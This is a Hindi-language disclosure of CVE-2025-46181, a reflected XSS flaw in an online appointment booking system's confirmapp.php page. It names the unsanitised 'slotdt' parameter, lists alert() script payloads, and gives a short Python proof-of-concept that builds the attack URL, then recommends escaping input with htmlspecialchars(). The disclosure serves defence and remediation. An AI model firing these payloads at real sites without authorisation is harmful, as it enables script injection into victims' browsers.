
रिफ्लेक्टेड XSS कमजोरी का खुलासा PoC स्क्रिप्ट और एक ऑनलाइन अपॉइंटमेंट बुकिंग सिस्टम के लिए सुधार मार्गदर्शन के साथ। इसमें कमजोर पैरामीटर विश्लेषण और प्रभाव मूल्यांकन शामिल है।
CVE-ID: CVE-2025-46181
द्वारा खोजा गया: Shemkumar P (shemkumar.github.io)
भेद्यता प्रकार: रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS)
गंभीरता: मध्यम
स्थिति: खुलासा, MITRE द्वारा CVE असाइन किया गया
एक रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता एक सार्वजनिक ऑनलाइन अपॉइंटमेंट बुकिंग सिस्टम (v1.0) में मौजूद है, विशेष रूप से उस पेज में जो अपॉइंटमेंट पुष्टिकरण को संभालता है। एक GET पैरामीटर इनपुट को ठीक से सैनिटाइज़ करने में विफल रहता है, जिससे पीड़ित के ब्राउज़र में जावास्क्रिप्ट इंजेक्शन और कोड निष्पादन संभव हो जाता है।
GET /confirmapp.php?slotdt=<payload>
उदाहरण पेलोड (एन्कोडेड):
<script>alert("XSS")</script>
<script>alert("You have been hijacked")</script>
🚫 नैतिक कारणों से लाइव लिंक को हटा दिया गया है। इस भेद्यता का परीक्षण नियंत्रित वातावरण में किया गया था।
import requests
from urllib.parse import quote
base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'
params = {
'fullname': 'test',
'mobile': '9999999999',
'emailid': '[email protected]',
'slotdt': payload,
'slottime': '11:00:00',
'doctorid': '2'
}
encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")
एप्लिकेशन को चाहिए:
htmlspecialchars() का उपयोग करके उपयोगकर्ता इनपुट को एस्केप करेंShemkumar P
🕸️ shemkumar.github.io
🔐 साइबर सुरक्षा शोधकर्ता | CTF उत्साही | CVE रिपोर्टर
⚠️ यह प्रकाशन केवल शैक्षिक और रक्षात्मक उपयोग के लिए है। उन सिस्टमों पर भेद्यताओं का परीक्षण या शोषण करना जिनके आप मालिक नहीं हैं या जिनके लिए आपके पास स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।